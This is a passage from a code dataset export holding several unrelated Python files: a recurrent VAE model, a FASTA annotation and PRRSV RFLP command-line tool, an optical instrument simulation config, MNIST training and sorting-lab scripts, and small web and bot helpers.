list(h_e.size())\n h_d = h_d.unsqueeze(1)\n\n Wd_hd = self.W_d(h_d.repeat(1, seq_len, 1)) # B x T_e x hidden_size\n We_he = self.W_e(h_e) # B x T_e x hidden_size\n\n e_t = self.v(torch.tanh(Wd_hd + We_he)).squeeze(-1) # B x T_e\n\n # Pad non-token tensors to be -1e10 such that exp(-1e10) = 0\n e_t = e_t.masked_fill(mask == 0, -1e10)\n a_t = torch.softmax(e_t, dim=-1) # B x T_e\n c_t = torch.bmm(a_t.unsqueeze(1), h_e).squeeze(1) # B x 2*hidden_size\n\n return c_t\n\n\nclass VAE(nn.Module):\n def __init__(self, embed_w, embed_size, hidden_size, output_size, dropout_p=0.1):\n super(VAE, self).__init__()\n \"\"\"\n As specified in the paper [https://arxiv.org/pdf/1708.00625.pdf],\n dimension of the latent variable z is equal to the size of hidden units\n \"\"\"\n self.encoded = False\n\n latent_size = hidden_size\n\n self.hidden_size = hidden_size\n self.latent_size = latent_size\n\n self.embedding = nn.Embedding.from_pretrained(embed_w)\n self.dropout = nn.Dropout(dropout_p)\n\n # Encoder\n self.encoder_rnn = nn.GRU(embed_size, hidden_size, num_layers=1, bidirectional=True, batch_first=True)\n self.attention = SimpleAttention(hidden_size)\n\n # Decoder (deterministic)\n self.decoder_rnn1 = nn.GRU(embed_size, hidden_size, num_layers=1, batch_first=True)\n self.decoder_rnn2 = nn.GRU(embed_size + 2 * hidden_size, hidden_size, num_layers=1, batch_first=True)\n\n # VAE Encoder\n self.W_yh_ez = nn.Linear(embed_size, hidden_size)\n self.W_zh_ez = nn.Linear(latent_size, hidden_size)\n self.W_hh_ez = nn.Linear(hidden_size, hidden_size)\n\n self.W_mu = nn.Linear(hidden_size, latent_size)\n self.W_logvar = nn.Linear(hidden_size, latent_size)\n\n # VAE Decoder\n self.W_zh_dy = nn.Linear(latent_size, hidden_size)\n self.W_hh_dy = nn.Linear(hidden_size, hidden_size)\n self.W_hy = nn.Linear(hidden_size, output_size)\n\n def encode(self, x, mask):\n self.mask = mask\n\n x = self.embedding(x) # B x t_k x embedding_size\n x = self.dropout(x)\n\n self.h_e, h_n = self.encoder_rnn(x) # B x t_k x 2*hidden_size\n self.h_e = self.h_e.masked_fill(mask.unsqueeze(-1) == 0, 0)\n\n self.encoded = True\n\n def forward(self, y, h_d1=None, h_d2=None, z=None):\n \"\"\"\n Generate output for the recurrent VAE decoder for a single timestep\n \"\"\"\n if not self.encoded:\n raise 
Exception(\"Need to first encode input sequence!\")\n\n y = self.embedding(y).squeeze(1) # B x 1 x embed_size\n\n input_len = self.mask.sum(dim=1).unsqueeze(1) # B x 1\n\n # Initialized h_d_0 to be the average of all the encoder input states\n if h_d1 is None or h_d2 is None:\n h_d_0 = torch.add(\n torch.sum(self.h_e[:, :, :self.hidden_size], 1) / input_len,\n torch.sum(self.h_e[:, :, self.hidden_size:], 1) / input_len) / 2.\n\n h_d_0 = h_d_0.detach() # B x hidden_size\n\n h_d1 = h_d_0 if h_d1 is None else h_d1\n h_d2 = h_d_0 if h_d2 is None else h_d2\n\n # Compute the deterministic hidden states of the decoder\n output, h_d1_t = self.decoder_rnn1(y.unsqueeze(1), h_d1.unsqueeze(0)) # 1 x B x hidden_size\n h_d1_t = h_d1_t.squeeze(0) # B x hidden_size\n\n c_t = self.attention(h_d1_t, self.h_e, self.mask)\n output, h_d2_t = self.decoder_rnn2(torch.cat((y, c_t), dim=-1).unsqueeze(1),\n h_d2.unsqueeze(0))\n\n h_d2_t = h_d2_t.squeeze(0) # B x hidden_size\n\n # Compute latent vector z at current time-step using VAE encoder\n\n if z is None:\n h_ez_t = torch.sigmoid(self.W_yh_ez(y) + self.W_hh_ez(h_d1)) # B x hidden_size\n\n # Use latent vector z for VAE hidden state if passed in from previous time-step\n else:\n h_ez_t = torch.sigmoid(self.W_yh_ez(y) + self.W_zh_ez(z) + self.W_hh_ez(h_d1)) # B x hidden_size\n\n mu_t = self.W_mu(h_ez_t) # B x latent_size\n logvar_t = self.W_logvar(h_ez_t) # B x latent_size\n sigma_t = torch.sqrt(torch.exp(logvar_t)) # B x latent_size\n eps = torch.randn(mu_t.size()) # B x latent_size\n\n z_t = mu_t + sigma_t * eps.to(sigma_t.device) # B x latent_size\n\n # Compute output vector y from latent vector z using VAE decoder\n h_dy_t = torch.tanh(self.W_zh_dy(z_t) + self.W_hh_dy(h_d2_t)) # B x hidden_size\n y_t = F.log_softmax(self.W_hy(h_dy_t), -1) # B x output_size\n\n # Compute the KL-Divergence between q(z_t|y, z) and p(z)\n KL = 0.5 * torch.sum(logvar_t.exp() + mu_t.pow(2) - logvar_t - 1, 1)\n\n return y_t, h_d1_t, h_d2_t, z_t, KL\n\n def init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Linear):\n nn.init.xavier_normal_(m.weight.data)\n nn.init.zeros_(m.bias.data)","sub_path":"models/VAE.py","file_name":"VAE.py","file_ext":"py","file_size_in_byte":5489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"251361159","text":"#!/usr/bin/env python3\n\nimport argparse\nimport os\nfrom progress.bar import Bar\nimport shutil\nimport subprocess\nimport sys\nimport traceback\n\n\nfrom include.misc import fasta, gff3, string\nfrom include.prrsv_orf5_rflp import prrsv_orf5_rflp\nfrom include.sequence_annotate import sequence_annotate\nfrom include.settings import bash_path, minimal_stderr, is_circular, is_double\nfrom include.species_identify import species_identify \n\n################################################################################\n\nspar_path = os.path.dirname(os.path.realpath(__file__))\nvalid_organism_li = [d for d in os.listdir(spar_path+\"/required/\") if os.path.isdir(spar_path+\"/required/\"+d) and d != \"blastdb\"]\nif bash_path != None:\n os.environ[\"PATH\"] = bash_path\n\n################################################################################\n################################################################################\n \ndef main():\n '''Main method : parse input arguments and run appropriate operation'''\n \n def str2bool(v):\n out = string.convert_bool(v)\n if out == None:\n raise argparse.ArgumentTypeError('Boolean value expected.')\n return(out)\n \n parser 
= argparse.ArgumentParser()\n subparsers = parser.add_subparsers(dest=\"process\", required=True, help=\"Type of input (rflp or annotate). See specific help for more options based on input type chosen e.g. python run.py rflp --help\")\n \n # annotate\n sp_annotate = subparsers.add_parser(\"annotate\", help=\"\") #!\n sp_annotate.add_argument(\"input\", type=str, help=\"Input FASTA file name\")\n sp_annotate.add_argument(\"--limit\", type=str, help=\"Annotates only genomic features provided in comma delimited list\")\n sp_annotate.add_argument(\"--organism\", type=str, help=\"Possible organism identity of sequences in input FASTA file provided in comma delimited list\")\n sp_annotate.add_argument(\"--output\", type=str, help=\"Output gff3 file name\")\n \n # rflp\n sp_rflp = subparsers.add_parser(\"rflp\", help=\"\") #!\n sp_rflp.add_argument(\"input\", type=str, help=\"Input FASTA file name\")\n sp_rflp.add_argument(\"--full\", type=str2bool, default=True, help=\"Only assign RFLP pattern to input sequences that are complete\")\n sp_rflp.add_argument(\"--output\", type=str, help=\"Output FASTA file name\")\n \n args = parser.parse_args()\n\n# logging.info(\"Input Arguments : %s\", args) #?\n \n read_fasta_li2 = fasta.read(args.input)\n # build random, non-existent directory name\n temp_dir = string.unique_directory(spar_path+\"/temporary/\")\n subprocess.call(\"mkdir -p \"+temp_dir, shell=True)\n \n # variable assignment based on invoked subparser option\n if args.process == \"annotate\":\n input_organism_li, choose_match_li = [], []\n if args.organism != None:\n input_organism_li = args.organism.split(\",\")\n if args.limit != None:\n choose_match_li = args.limit.split(\",\")\n if args.process == \"rflp\":\n input_organism_li, choose_match_li = [\"PRRSV1\", \"PRRSV2\"], [\"ORF5\"]\n \n # Run\n\n # processes input fasta based on provided list of possible organism/s and feature/s\n annotate_li4 = [[] for x in read_fasta_li2[0]]\n input_organism_li = [x for x in input_organism_li if x in valid_organism_li]\n if len(input_organism_li) == 0:\n input_organism_li = valid_organism_li[:]\n # check required bash utilities\n required_program_li = [\"hmmalign\", \"hmmbuild\", \"mafft\", \"awk\"]\n if \"prrsv_orf5_RFLP\" in sys.argv[0] or len(input_organism_li) != 1:\n required_program_li += [\"blastn\", \"makeblastdb\", \"blastdbcmd\"]\n missing_program_li = [x for x in required_program_li if shutil.which(x) == None]\n if len(missing_program_li) > 0:\n print(\"The following dependencies could not be found:\", \", \".join(missing_program_li)+\".\", file=sys.stderr)\n print(\"Please install and rerun.\", file=sys.stderr)\n else:\n if minimal_stderr: # ignore affirmative sequence processing and error traceback\n original_stderr = sys.stderr\n sys.stderr = open(os.devnull, \"w\")\n # check selected organism dependencies\n for organism in input_organism_li:\n if not sequence_annotate.prep.main(organism):\n print(\"Removing \"+organism+\" from searchable organisms.\", file=sys.stderr)\n input_organism_li = [x for x in input_organism_li if x != organism]\n fasta_di, sum_len = {}, len(read_fasta_li2[1])\n if len(input_organism_li) != 1:\n print(\"Identifying species for \"+str(len(read_fasta_li2[1]))+\" sequences\", file=sys.stderr)\n identify = species_identify(temp_dir)\n fasta_di = identify.main(read_fasta_li2, input_organism_li)\n sum_len = sum([len(fasta_di[x]) for x in fasta_di])\n blast_complete_str = \"Species identification complete\"\n if len(read_fasta_li2[1]) > sum_len:\n blast_complete_str += \" 
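Editor's note: a minimal, runnable reduction of the CLI pattern in the record above — one subcommand per mode, with a boolean flag routed through a `str2bool` converter so `--full false` works from the shell. File names here are placeholders:

```python
import argparse

def str2bool(v):
    if v.lower() in ("yes", "true", "t", "1"):
        return True
    if v.lower() in ("no", "false", "f", "0"):
        return False
    raise argparse.ArgumentTypeError("Boolean value expected.")

parser = argparse.ArgumentParser()
sub = parser.add_subparsers(dest="process", required=True)

sp_annotate = sub.add_parser("annotate")
sp_annotate.add_argument("input")

sp_rflp = sub.add_parser("rflp")
sp_rflp.add_argument("input")
sp_rflp.add_argument("--full", type=str2bool, default=True)

args = parser.parse_args(["rflp", "genomes.fasta", "--full", "false"])
print(args.process, args.input, args.full)   # rflp genomes.fasta False
```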
(\"+str(len(read_fasta_li2[1])-sum_len)+\" sequences could not be identified)\"\n print(blast_complete_str, file=sys.stderr) \n else:\n fasta_di[input_organism_li[0]] = [[index, sequence] for index, sequence in enumerate(read_fasta_li2[1])]\n print(\"Annotating \"+str(sum_len)+\" sequences...\", file=sys.stderr)\n bar = Bar(\"Progress\", fill='#', suffix='%(percent)d%%', max=sum_len) # track progress with bar visual\n try:\n # annotate by organism\n for organism in fasta_di:\n annotate = sequence_annotate.process(organism, temp_dir)\n choose_match_li = [x for x in choose_match_li if x in annotate.total_cds]\n if choose_match_li == []:\n choose_match_li = annotate.total_cds \n for di_li in fasta_di[organism]: # use original FASTA order\n total_annotate_li2 = annotate.main(di_li[1], choose_match_li)\n if len(total_annotate_li2) > 0:\n annotate_li4[di_li[0]] = [organism, total_annotate_li2]\n bar.next()\n except:\n traceback.print_exc(file=sys.stderr)\n print(read_fasta_li2[0], file=sys.stderr) #?\n bar.finish()\n print(\"Annotation process complete\", file=sys.stderr)\n if minimal_stderr:\n sys.stderr.close()\n sys.stderr = original_stderr\n \n #annotate argument\n if args.process == \"annotate\":\n output_gff3 = gff3.write(read_fasta_li2, annotate_li4, spar_path+\"/required/\")\n if args.output != None:\n write_file = open(args.output, \"w\")\n write_file.write(output_gff3)\n write_file.close()\n else:\n print(output_gff3)\n \n #rflp argument\n if args.process == \"rflp\":\n rflp = prrsv_orf5_rflp(temp_dir)\n print(\"Assigning RFLP patterns to \"+str(len(annotate_li4))+\" sequences...\", file=sys.stderr)\n bar = Bar(\"Progress\", fill='#', suffix='%(percent)d%%', max=len(annotate_li4)) # track progress with bar visual\n for fasta_index, annotate_li3 in enumerate(annotate_li4):\n if len(annotate_li3) > 0 and annotate_li3[0] == \"PRRSV2\":\n read_fasta_li2[0][fasta_index] += \"/\"+rflp.main(read_fasta_li2[1][fasta_index], annotate_li3[1], args.full)\n else:\n read_fasta_li2[0][fasta_index] += \"/na\" # invalid organism\n bar.next()\n bar.finish()\n print(\"RFLP pattern assignment complete\", file=sys.stderr)\n if args.output != None and os.path.isfile(args.output):\n fasta.write(args.output, read_fasta_li2)\n else:\n for fasta_index, head in enumerate(read_fasta_li2[0]):\n print(\">\"+head)\n print(read_fasta_li2[1][fasta_index])\n \n # remove temporary directory\n subprocess.call(\"rm -rf \"+temp_dir, shell=True)\n\n\nif __name__ == \"__main__\":\n main()\n \n \n\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":7974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"22867527","text":"\n# ISM CONFIGURATION FILE\nimport numpy as np\n\nclass ismConfig:\n\n def __init__(self):\n\n # Configuration parameters\n #--------------------------------------------------------------------------------\n # CCD\n self.pix_size = 30e-6 # [m] Pixel size in microns for the MS channels\n self.t_int = 0.00672 # [s] Integration time\n\n # Optical system\n self.D = 0.150 # [m] Telescope pupil diameter\n self.f = 0.5262 # [m] Focal length\n self.Tr = 0.99 # [-] Optical transmittance\n self.wLF = 100e-9 # [m] RMS of low-frequency wavefront errors\n self.wHF = 100e-9 # [m] RMS of high-frequency wavefront errors\n self.kLF = 180 # [-] Empirical coefficient for the aberrations MTF for low-frequency wavefront errors\n self.kHF = 300 # [-] Empirical coefficient for the aberrations MTF for high-frequency wavefront errors\n self.defocus = 2 
# [-] Defocus coefficient (defocus/(f/N)). 0-2 low defocusing\n self.ksmear = 0.191 # [pixels] Coefficient for the smearing ALT\n self.kmotion = 0.02 # [pixels] Amplitude of high-frequency component for the motion smear MTF in ALT and ACT\n self.kernel_half_width = 0.5 # [pixels] Half-width of the kernel\n self.kernel_step = 0.1 # [pixels] Sampling of the kernel\n\n # Central wavelength of the band\n self.wv = np.array([0.49,0.665,0.865,0.945])*1e-6 # [m] Central wavelength\n\n # Photonic Stage\n self.QE = 0.8 # [e-/ph] Quantum efficiency\n self.FWC = 420000 # [ph] Full Well Capacity\n\n # Detection stage\n self.bad_pix = 1.0 # [%] Percentage of bad/dead pixels in the CCD\n self.dead_pix = 0.5 # [%]\n self.bad_pix_red = 0.1 # [-] Reduction in the quantum efficiency of the pixel (over 1)\n self.dead_pix_red = 0.4 # [-]\n self.kprnu = 0.04 # 4% Coefficient by which we multiply the PRNU standard normal distribution\n # Dark signal modelling\n self.kdsnu = 0.2 # 20% Coefficient by which we multiply the DSNU standard normal distribution\n self.T = 300.0 # [K] Temperature of the system\n self.Tref = 238 # [K] Reference temperature\n self.ds_A_coeff = 7.87 # [e-]\n self.ds_B_coeff = 6040 # [K]\n\n # Electronic stage\n self.ADC_gain = 0.56 # [-]\n self.OCF = 5.4e-6 # [V/e-] Output conversion factor\n self.bit_depth = 12 # [-]\n self.min_voltage = 0.0 # [V]\n self.max_voltage = 0.86 # [V]\n\n self.seed = 123456789 # Seed for the random generators\n\n # Auxiliary inputs (relative paths to the root folder)\n #--------------------------------------------------------------------------------\n self.isrffile = 'isrf/ISRF_'\n\n # Flags to save intermediate outputs\n #--------------------------------------------------------------------------------\n self.save_after_isrf = True # optical stage after the ISRF\n self.save_optical_stage = True # optical stage after the MTF\n self.save_after_ph2e = True # detections stage after the photon to electron conversion\n self.save_after_prnu = True # detections stage after the PRNU\n self.save_after_ds = True # detections stage after the Dark Signal\n self.save_detection_stage = True # detections stage after the bad/dead pixels\n self.save_vcu_stage = True # Video Conversion Unit stage\n\n # Flags to enable or disable the application of noises and effects\n #--------------------------------------------------------------------------------\n # Optical stage. Use the PSF convolution. 
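Editor's note: the config above describes `kprnu`/`kdsnu` as coefficients multiplying a standard-normal distribution, with a fixed `seed` for the random generators. A sketch of how such coefficients are typically turned into unit-mean per-pixel gain maps — this is an assumption about downstream usage; the config file itself only stores the numbers:

```python
import numpy as np

kprnu, kdsnu, seed = 0.04, 0.2, 123456789
rng = np.random.default_rng(seed)             # seeded for reproducible reruns

shape = (4, 4)                                # toy detector size
prnu = 1.0 + kprnu * rng.standard_normal(shape)   # photo-response non-uniformity
dsnu = 1.0 + kdsnu * rng.standard_normal(shape)   # dark-signal non-uniformity

signal_e = 1000.0 * np.ones(shape)            # electrons before pixel effects
print((signal_e * prnu).round(1))             # PRNU applied multiplicatively
print(prnu.mean())                            # ~1 by construction
```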
If False, will use the MTF\n self.do_psf_conv = False\n # Detection stage errors and effects\n self.apply_prnu = True\n self.apply_dark_signal = True\n self.apply_bad_dead = True\n","sub_path":"config/ismConfig.py","file_name":"ismConfig.py","file_ext":"py","file_size_in_byte":4564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"625487327","text":"import gzip\nimport numpy\nimport ModularNetwork\nimport matplotlib.pyplot as plt\nimport time\nimport random\nimport pickle\n\nf = gzip.open(\"../resources/\" + \"mnist.pkl.gz\", \"rb\")\ntrainingData, testData, validationData = pickle.load(f)\nf.close()\n\n\ndef toVect(i):\n e = numpy.zeros((10, 1))\n e[i] = 1.0\n return e\n\n\ntrainingData = [data for data in\n zip([numpy.reshape(x, (784, 1)) for x in trainingData[0]], [toVect(y) for y in trainingData[1]])]\ntestData = [data for data in\n zip([numpy.reshape(x, (784, 1)) for x in testData[0]], [toVect(y) for y in testData[1]])]\nvalidationData = [data for data in zip([numpy.reshape(x, (784, 1)) for x in validationData[0]],\n [toVect(y) for y in validationData[1]])]\nrandom.shuffle(trainingData)\n\ninputSize = len(trainingData[0][0])\noutputSize = len(trainingData[0][1])\n\nshape = [inputSize, 100, 100, 100, outputSize]\nprint(shape)\nn = ModularNetwork.ModularNetwork(shape)\nepochs = 30\nminiBatchSize = 10\nalpha = 0.25\neta = 5.0\n\ntS = time.time()\ntrainingCost, trainingAccuracy, testCost, testAccuracy = n.learn(trainingData[:int(len(trainingData)/10)], epochs,\n miniBatchSize, alpha, eta, validationData)\ntE = time.time()\nprint(\"Learning phase took \" + str(tE - tS) + \"s with \" + str(epochs) + \" epochs, batch size = \" + str(\n miniBatchSize) + \", alpha = \" + str(alpha) + \", eta = \" + str(eta) + \".\\n\")\n\nplt.figure()\nplt.plot(testAccuracy)\nplt.plot(trainingAccuracy)\nplt.legend()\nplt.show()\n","sub_path":"Code/AVeryModularNetwork/src/MNISTMain.py","file_name":"MNISTMain.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"547619776","text":"import argparse\nimport traceback\n\nfrom server import request\n\nparser = argparse.ArgumentParser(description=\"Launch server tests\")\nparser.add_argument(\"n_tests\", metavar=\"N\", type=int, nargs=1,\n help=\"the number of tests to run\")\n\nargs = parser.parse_args()\nn_tests = args.n_tests[0]\nsuccess = 0\nfailed = 0\nfor i in range(n_tests):\n out, e = request.request()\n if out == 0:\n print(f\" Test {i + 1}/{n_tests} : OK\")\n success += 1\n else:\n print(f\" Test {i + 1}/{n_tests} : failed with error : {e}\")\n failed += 1\nrate = \"{:0.2f}%\".format((success / n_tests) * 100)\nprint(f\"Testing finished with {success} sucess and {failed} failures,\"\n f\" success rate = {rate}\")\n","sub_path":"test/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"376764704","text":"'''\nRicky Cheah\nFeb 14, 2020\n\nThis program modifies the quicksort function so that it calls insertionsort \nto sort any sublist whose size is less than a specific threshold of items. \n\nA table with rows of different threshold number and columns of different list\nsizes is generated to show their relationship. 
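Editor's note: the MNIST script in the record above unpickles the classic `mnist.pkl.gz` and builds one-hot label vectors. That pickle was written under Python 2, so loading it under Python 3 generally needs an explicit encoding — noted here as a common gotcha, not a change to the script:

```python
import gzip
import pickle
import numpy as np

def load_mnist(path="mnist.pkl.gz"):
    # encoding="latin1" lets Python 3 read the Python-2-era pickle
    with gzip.open(path, "rb") as f:
        return pickle.load(f, encoding="latin1")

def to_vect(i, classes=10):
    # One-hot column vector, the same shape the script's toVect produces
    e = np.zeros((classes, 1))
    e[i] = 1.0
    return e

print(to_vect(3).ravel())   # [0. 0. 0. 1. 0. 0. 0. 0. 0. 0.]
```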
\n\nAll quicksort and insertionsort codes are orignally by Ken Lambert.\n'''\n\n\nfrom profiler import Profiler\nimport random #to generate numbers in list\n\ndef insertionSort(lyst, left, right, profiler):\n '''\n Code for insertion sort.\n Takes in an entire list (lyst), \n but only sorts items between \"left\" and \"right\" index. \n profiler object helps to keep a count of different operations and time. \n '''\n i = left + 1\n while i < right + 1:\n exchanged = False #to keep better count of exchanges\n itemToInsert = lyst[i]\n j = i - 1\n while j >= 0: \n profiler.comparison()\n if itemToInsert < lyst[j]:\n lyst[j + 1] = lyst[j]\n profiler.exchange()\n j -= 1\n exchanged = True\n else:\n break\n lyst[j + 1] = itemToInsert\n if exchanged:\n profiler.exchange() #only increase if we actually did exchange\n i += 1\n\ndef quicksort(lyst, mod, threshold, profiler):\n '''\n The main quicksort program, takes in the initial full list (lyst) for sorting.\n Calls the quicksortHelper function to start sorting. \n mod: if True, runs quicksort below a certain list length.\n threshold: list length to use quicksort. \n '''\n quicksortHelper(lyst, 0, len(lyst) - 1, mod, threshold, profiler)\n\ndef quicksortHelper(lyst, left, right, mod, threshold, profiler):\n '''\n Passes the list to the partition function, and split using pivotLocation. \n left: start index of partial list\n right: end index of partial list.\n mod: if True, runs quicksort below a certain list length.\n threshold: list length to use quicksort. \n '''\n if left < right:\n if mod and right - left < threshold: #check if need to use insertionsort\n insertionSort(lyst, left, right, profiler)\n \n else: #continue with quicksort\n pivotLocation = partition(lyst, left, right, profiler)\n quicksortHelper(lyst, left, pivotLocation - 1, mod, threshold, profiler)\n quicksortHelper(lyst, pivotLocation + 1, right, mod, threshold, profiler)\n\ndef partition(lyst, left, right, profiler):\n '''\n Takes in a list partially sorts between \"left\" and \"right\" index. \n Determines the pivot, and moves items smaller than pivot to the left side.\n Returns the boundary location for further splitting. \n '''\n # Find the pivot and exchange it with the last item\n middle = (left + right) // 2\n profiler.exchange()\n pivot = lyst[middle]\n lyst[middle] = lyst[right]\n lyst[right] = pivot\n # Set boundary point to first position\n boundary = left\n # Move items less than pivot to the left, move boundary if swapped\n for index in range(left, right):\n profiler.comparison()\n if lyst[index] < pivot:\n swap(lyst, index, boundary)\n profiler.exchange()\n boundary += 1\n # Exchange the pivot item and the boundary item\n swap (lyst, right, boundary)\n profiler.exchange()\n return boundary\n\ndef swap(lyst, i, j):\n \"\"\"\n Exchanges the items at positions i and j.\n \"\"\"\n # You could say lyst[i], lyst[j] = lyst[j], lyst[i]\n # but the following code shows what is really going on\n temp = lyst[i]\n lyst[i] = lyst[j]\n lyst[j] = temp\n\n\ndef main():\n '''\n Shows the time difference and numbers of comparisons & exchanges \n for original quicksort and modified quicksort \n '''\n p = Profiler()\n #this sample list is taken from Lab2's example\n lyst1 = [18, 9, 31, 23, 8, 34, 43, 34, 33, 33, 17, 19, 51, 14, 3, 16, 31, 21, 48, 44, 29, 24, 13, 26, 31, 18, 37, 11, 48, 27, 26, 38, 7, 40, 24, 45, 29, 11, 46, 48, 8, 21, 15, 43, 7, 42, 47, 17, 44, 51]\n #the list is copied to ensure the test results are comparable. 
\n lyst2 = lyst1[:]\n\n\n# UNCOMMENT print statements to view lists before and after sorting.\n# print(lyst1, \"\\n\")\n print(p.test(quicksort, lyst1, comp = True, exch = True, mod = False))\n# print(\"Sorted:\\n\", lyst1, \"\\n\")\n \n# print(lyst2, \"\\n\")\n print(p.test(quicksort, lyst2, comp = True, exch = True, threshold = 10, mod = True))\n# print(\"Sorted:\\n\", lyst2, \"\\n\")\n\n print(\"After sorting, List 1 == List 2:\", lyst1 == lyst2)\n print(\"_\"*80)\n \n #this portion generates a list with randomized numbers\n size = 5000\n lyst = []\n for count in range(size):\n lyst.append(random.randint(1, size + 1))\n lyst1 = lyst[:]\n lyst2 = lyst[:]\n print(p.test(quicksort, lyst1, comp = True, exch = True, mod = False))\n print(p.test(quicksort, lyst2, comp = True, exch = True, threshold = 10, mod = True))\n \n print(\"After sorting, List 1 == List 2:\", lyst1 == lyst2)\n print(\"_\"*80)\n findBestCase()\n\ndef findBestCase():\n '''\n Function to compile a table of the time used for sorting for:\n different list sizes and threshold values.\n '''\n p = Profiler()\n masterList = [] #list to contain the lists of different sizes\n resultNoMod = []\n \n print(\" \"*2, end = \"\")\n for exponent in range(1,5): #this creates the master list using random numbers for different list sizes\n size = 5*10**exponent\n \n lyst = []\n for count in range(size):\n lyst.append(random.randint(1, size + 1))\n masterList.append(lyst)\n print(f\"{size:<13}\", end = \"\") #this prints the table headers (list size)\n print()\n \n #this creates the results for non-modified quicksort\n for i in range(0, len(masterList)): \n tempLyst = masterList[i][:] #create list so we don't change the master list\n resultNoMod.append(repr(p.test(quicksort, tempLyst, mod = False)))\n print(resultNoMod, \"Not Modified\")\n \n\n #this creates the results for non-modified quicksort, with different thresholds\n for multiplier in range (1,5):\n resultMod = []\n thresholdValue = multiplier * 10\n for i in range(0, len(masterList)): \n tempLyst = masterList[i][:] #create list so we don't change the master list\n resultMod.append(repr(p.test(quicksort, tempLyst, threshold = thresholdValue, mod = True)))\n print(resultMod, \"Threshold =\", thresholdValue) #prints threshold\n \nif __name__ == \"__main__\":\n main() \n\n\n'''\n1. The performance of modified quicksort is very dependent on the threshold:\n from the graph generated we see that a threshold of around 10 is optimum. \n \n2. The size of the list doesn't affect the modification; it performs better\n than the original quicksort each time (when threshold is 10).\n This improvement is noticeable with larger list sizes (>5000).\n \n3. Insertionsort should be used instead of quicksort when the list \n is \"small enough\", around 10 items as seen from the table. \n \n4. The difference is small; the modified version performs a little\n more comparions, but a little less exchanges. \n\n For example, in a random list of 5000 items, the modified \n quicksort did around 75000 comparisons and 41000 exchanges, \n compared to the original versions 74000 and 41600. 
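Editor's note: a quick, self-contained way to observe the threshold effect the record's table measures — time pure quicksort against the hybrid cut-over on the same random data. Standard library only; this is a compact re-implementation for timing, with the profiler omitted:

```python
import random
import timeit

def insertion_sort(a, lo, hi):
    for i in range(lo + 1, hi + 1):
        item, j = a[i], i - 1
        while j >= lo and a[j] > item:
            a[j + 1] = a[j]
            j -= 1
        a[j + 1] = item

def quicksort(a, lo, hi, threshold=0):
    if hi - lo < threshold:
        insertion_sort(a, lo, hi)        # small sublist: switch algorithms
    elif lo < hi:
        mid = (lo + hi) // 2
        a[mid], a[hi] = a[hi], a[mid]    # move middle pivot to the end
        pivot, b = a[hi], lo
        for i in range(lo, hi):
            if a[i] < pivot:
                a[i], a[b] = a[b], a[i]
                b += 1
        a[hi], a[b] = a[b], a[hi]        # place pivot at the boundary
        quicksort(a, lo, b - 1, threshold)
        quicksort(a, b + 1, hi, threshold)

data = [random.randint(1, 5000) for _ in range(5000)]
for t in (0, 10):
    secs = timeit.timeit(lambda: quicksort(data[:], 0, len(data) - 1, t), number=5)
    print(f"threshold={t:>2}: {secs:.3f}s")
```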
\n \n'''","sub_path":"csc242/Lab2_Cheah/Lab2_Cheah.py","file_name":"Lab2_Cheah.py","file_ext":"py","file_size_in_byte":7445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"404293304","text":"import asyncio\n\n\nbot = None\n\n\nclass TypingContext:\n def __init__(self, channel, delay_between=5, loop=None):\n if not bot:\n raise RuntimeError('Bot not yet initialised when'\n ' TypingContext created')\n\n self.channel = channel\n self.delay_between = delay_between\n self.loop = loop or asyncio.get_event_loop()\n self.typing = False\n\n def __enter__(self):\n self.typing = True\n self.loop.create_task(self.send_typing())\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.typing = False\n\n async def send_typing(self):\n while self.typing:\n await asyncio.gather(\n bot.send_typing(self.channel),\n asyncio.sleep(self.delay_between, loop=self.loop)\n )\n","sub_path":"src/levbot/typing_context.py","file_name":"typing_context.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"155008773","text":"from subject_page import *\r\nfrom cn.edustar.jitar.pojos import Placard\r\n\r\nclass placard_add(BaseSubject):\r\n def __init__(self):\r\n BaseSubject.__init__(self)\r\n self.placard = None\r\n self.placradService = __spring__.getBean(\"placardService\")\r\n \r\n def execute(self):\r\n if self.loginUser == None:\r\n return self.LOGIN\r\n \r\n if self.isAdmin() == False:\r\n self.addActionError(u\"您你没有管理的权限!\")\r\n return self.ERROR\r\n placardId = self.params.safeGetIntParam(\"placardId\")\r\n if placardId > 0:\r\n self.placard = self.placradService.getPlacard(placardId) \r\n \r\n if request.getMethod() == \"POST\":\r\n self.clear_subject_cache()\r\n self.save_post()\r\n \r\n return self.news_edit()\r\n \r\n def news_edit(self):\r\n request.setAttribute(\"placard\", self.placard)\r\n return \"/WEB-INF/subjectmanage/placard_add.ftl\"\r\n \r\n def save_post(self):\r\n placard_title = self.params.safeGetStringParam(\"placard_title\")\r\n content = self.params.safeGetStringParam(\"content\") \r\n if placard_title == \"\":\r\n self.addActionError(u\"请输入标题\")\r\n return self.ERROR\r\n if content == \"\":\r\n self.addActionError(u\"请输入内容\")\r\n return self.ERROR\r\n if self.placard == None:\r\n self.placard = Placard()\r\n self.placard.setObjId(self.subject.subjectId)\r\n self.placard.setObjType(14)\r\n self.placard.setHide(False)\r\n self.placard.setTitle(placard_title)\r\n self.placard.setUserId(self.loginUser.userId)\r\n self.placard.setContent(content)\r\n self.placradService.savePlacard(self.placard)\r\n response.sendRedirect(\"placard.py?id=\" + str(self.subject.subjectId))","sub_path":"WebContent/subject/manage/placard_add.py","file_name":"placard_add.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"25960983","text":"class Planner(object):\n def __init__(self, remove_local_file):\n self.remove_local_file = remove_local_file\n\n def plan(self, snapshot_from, snapshot_to):\n plans = []\n # Add and update files\n for 